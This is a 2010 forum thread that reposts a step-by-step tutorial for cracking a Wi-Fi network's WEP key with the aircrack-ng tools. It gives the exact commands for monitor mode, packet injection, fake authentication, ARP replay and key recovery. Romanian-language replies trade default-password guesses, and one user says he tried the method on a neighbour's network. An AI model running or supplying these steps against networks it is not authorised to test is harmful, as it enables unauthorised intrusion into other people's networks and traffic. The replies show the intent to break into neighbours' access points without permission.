Nytro Posted September 18, 2010 Report Posted September 18, 2010 CRACK WIFI – Simple WEP CrackOverviewTo crack the WEP key for an access point, we need to gather lots of initialization vectors (IVs). Normal network traffic does not typically generate these IVs very quickly. Theoretically, if you are patient, you can gather sufficient IVs to crack the WEP key by simply listening to the network traffic and saving them. Since none of us are patient, we use a technique called injection to speed up the process. Injection involves having the access point (AP) resend selected packets over and over very rapidly. This allows us to capture a large number of IVs in a short period of time.Equipments usedWifi Adaptor : Alfa AWUS036H (available on eBay & Amazon)Software : Backtrack 4 (Free download from BackTrack Linux - Penetration Testing Distribution)Step 1 – Start the wireless interface in monitor mode on AP channel airmon-ng start wlan1 6starts wifi interface in channel 6Step 2 – Test Wireless Device Packet Injection aireplay-ng -6 -e infosec -a 00:1B:11:24:27:2E wlan1-9 means injection-a 00:1B:11:24:27:2E is the access point MAC addressStep 3 – Start airodump-ng to capture the IVs airodump-ng -c 6 –bssid 00:1B:11:24:27:2E -w output wlan1Step 4 – Use aireplay-ng to do a fake authentication with the access pointIn order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “DeAuthentication” packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets. aireplay-ng -1 0 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1-1 means fake authentication0 reassociation timing in seconds-e infosec is the wireless network name-a 00:14:6C:7E:40:80 is the access point MAC address-h 00:0F:B5:88:AC:82 is our card MAC addressOR aireplay-ng -1 2 -o 1 -q 10 -e infosec -a 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan12 – Reauthenticate every 2 seconds.-o 1 – Send only one set of packets at a time. Default is multiple and this confuses some APs.-q 10 – Send keep alive packets every 10 seconds.Troubleshooting TipsSome access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and…Run: tcpdump -n -vvv -s0 -e -i | grep -i -E ”(RA:|Authentication|ssoc)”You would then look for error messages.If at any time you wish to confirm you are properly associated is to use tcpdump and look at the packets. Start another session and…Run: “tcpdump -n -e -s0 -vvv -i wlan1”Here is a typical tcpdump error message you are looking for:11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated stationNotice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.If you want to select only the DeAuth packets with tcpdump then you can use: “tcpdump -n -e -s0 -vvv -i wlan1 | grep -i DeAuth”. You may need to tweak the phrase “DeAuth” to pick out the exact packets you want.Step 5 – Start aireplay-ng in ARP request replay mode aireplay-ng -3 -b 00:1B:11:24:27:2E -h 00:c0:ca:27:e5:6a wlan1Step 6 – Run aircrack-ng to obtain the WEP key aircrack-ng -b 00:1B:11:24:27:2E output*.capAll Done! Sursa: Crack Wifi | Hacking Articles Quote
icebird Posted September 18, 2010 Report Posted September 18, 2010 Eu de obicei pun 13 zero-uri si merge Quote
dancdc Posted December 20, 2010 Report Posted December 20, 2010 sau admin ..si surpriza merge in 30 % din cazuri testat in toata europa Quote
aurascalarasi09 Posted December 25, 2010 Report Posted December 25, 2010 Sunt si alte programe asemanatoare si mult mai usor de folosit Quote
wolfy574 Posted December 27, 2010 Report Posted December 27, 2010 care ar fi acele programe , varianta cu aircrack mi se pare cam complicata , am incercat pe vecinul si nu merge . . . cateva aplicatii mai eficiente care aveti sa le puneti , merry x-mas Quote
Golfo Posted February 2, 2011 Report Posted February 2, 2011 wifiway ? wifislax ? ati incercat ? Quote